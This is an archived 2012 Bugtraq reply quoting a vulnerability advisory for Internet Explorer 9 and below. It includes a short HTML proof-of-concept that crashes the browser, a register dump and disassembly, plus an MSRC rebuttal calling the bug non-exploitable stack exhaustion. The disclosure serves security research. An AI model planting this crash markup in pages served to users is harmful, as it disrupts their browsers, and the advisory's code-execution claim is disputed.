| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 20 Dec 2012 01:05:07 +0100 From: Fabio Baroni <fabiothebest@...il.com> To: bugtraq@...urityfocus.com Subject: Re: Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability Jonathan Ness from the Microsoft Security Response Center says this IE9 POC is stack exhaustion, not a stack-based buffer overflow and Stack exhaustion is typically not exploitable for code execution. 2012/12/19 <pereira@...biz.de>: > ----------------------------------------------------------------------- > Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability > ----------------------------------------------------------------------- > > Author: Jean Pascal Pereira <pereira@...biz.de> > > Vendor: Microsoft Internet Explorer 9.x and below > > Description: > > The application is prone to a remote stack overflow vulnerability. > > Successful exploitation may lead to arbitrary code execution. > > ---------------------------------------------------------------------- > Proof Of Concept: > ---------------------------------------------------------------------- > > <table></for xmlns="1"> > <td><datetime><colgroup> > <id><dd><col> > </table><object> > <hr><base> > > ---------------------------------------------------------------------- > Register Dump: > ---------------------------------------------------------------------- > > EAX 800706BE > ECX 763FCDB3 RPCRT4.763FCDB3 > EDX 00000000 > EBX 0604393C > ESP 003FDDD4 > EBP 003FDDE0 > ESI 003FDE30 > EDI 761AFA10 ole32.761AFA10 > EIP 7629CF51 ole32.7629CF51 > > ---------------------------------------------------------------------- > Crash Instruction: > ---------------------------------------------------------------------- > > 7629CF36 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] > 7629CF39 24 04 AND AL,4 > 7629CF3B 0FB6C0 MOVZX EAX,AL > 7629CF3E F7D8 NEG EAX > 7629CF40 1BC0 SBB EAX,EAX > 7629CF42 25 0A010180 AND EAX,8001010A > 7629CF47 8901 MOV DWORD PTR DS:[ECX],EAX > 7629CF49 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] > 7629CF4C 50 PUSH EAX > 7629CF4D 53 PUSH EBX > 7629CF4E 8975 D8 MOV DWORD PTR SS:[EBP-28],ESI > 7629CF51 FF70 5C PUSH DWORD PTR DS:[EAX+5C] > > ---------------------------------------------------------------------- > At 0x7629CF51, a read access violation occurs. > ---------------------------------------------------------------------- > > Jean Pascal Pereira <pereira@...biz.de> || http://www.0xffe4.org > > Copy: http://paste.kde.org/627968/
Powered by blists - more mailing lists